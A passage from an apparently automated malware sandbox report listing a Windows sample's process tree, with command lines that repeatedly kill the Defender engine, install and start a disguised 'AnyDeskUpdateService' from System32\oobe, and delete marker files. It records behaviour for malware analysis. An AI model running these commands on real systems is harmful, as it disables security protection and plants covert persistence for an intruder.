                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:58
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:59
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:60
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff7403e0000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:61
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:62
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:63
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:64
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:65
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:66
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:67
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:68
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:69
                                                                                                    Start time:20:26:21
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:70
                                                                                                    Start time:20:26:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:71
                                                                                                    Start time:20:26:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:72
                                                                                                    Start time:20:26:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:73
                                                                                                    Start time:20:26:23
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:74
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff799c70000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:75
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:76
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:77
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:78
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:79
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:80
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:81
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:82
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:83
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:84
                                                                                                    Start time:20:26:24
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff7934f0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:85
                                                                                                    Start time:20:26:27
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:86
                                                                                                    Start time:20:26:27
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:87
                                                                                                    Start time:20:26:27
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:88
                                                                                                    Start time:20:26:28
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:89
                                                                                                    Start time:20:26:28
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:90
                                                                                                    Start time:20:26:28
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:91
                                                                                                    Start time:20:26:30
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:92
                                                                                                    Start time:20:26:30
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:93
                                                                                                    Start time:20:26:30
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:94
                                                                                                    Start time:20:26:30
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:95
                                                                                                    Start time:20:26:30
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:96
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:97
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:98
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:99
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:100
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:101
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:102
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:103
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:104
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:105
                                                                                                    Start time:20:26:31
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:107
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:108
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
